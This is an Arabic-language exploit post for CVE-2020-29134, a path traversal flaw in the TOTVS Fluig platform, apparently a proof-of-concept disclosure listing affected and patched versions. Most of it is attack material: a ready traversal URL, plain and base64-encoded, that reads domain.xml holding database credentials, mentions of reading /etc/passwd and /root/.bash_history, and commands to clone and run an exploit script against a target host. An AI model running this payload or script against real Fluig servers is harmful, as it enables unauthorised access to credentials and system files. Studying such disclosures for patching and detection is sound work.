
استغلال CVE-2020-29134 - TOTVS Fluig Platform - اجتياز المسار
Fluig هي منصة الإنتاجية والتعاون التي تتكامل مع نظام ERP،
ومع أنظمة شركتك الأخرى لإحداث ثورة في طريقة عملك أنت وفريقك.
تسمح منصة TOTVS Fluig باجتياز المسار عبر معامل مُرمّز في base64.
عند استغلالها، تتيح هذه الثغرة قراءة ملفات XML الحساسة التي تحتوي على
بيانات للوصول إلى قاعدة البيانات، وفي بعض الحالات، اتصالات LDAP وتكاملات نظام ERP.
بالإضافة إلى ذلك، من الممكن أيضًا استكشاف ملفات النظام، مثل /etc/passwd و /root/.bash_history
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...
<== Fluig Lake 1.7.0-210303 (تم التصحيح)
<== Fluig 1.6.5-210308 (تم التصحيح)
<== Fluig 1.6.4-210308 (تم التصحيح)

http://fluig.host.com/volume/stream/Rmx1aWc=/
?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml
P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
https://www.exploit-db.com/exploits/49622
# git clone https://github.com/lucxssouza/CVE-2020-29134.git
# cd CVE-2020-29134
# chmod +x xfluig.sh
مثال 1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (عدد الطلبات التي يولدها wfuzz)
مثال 2: ./xfluig.sh http://fluig.host.com:PORT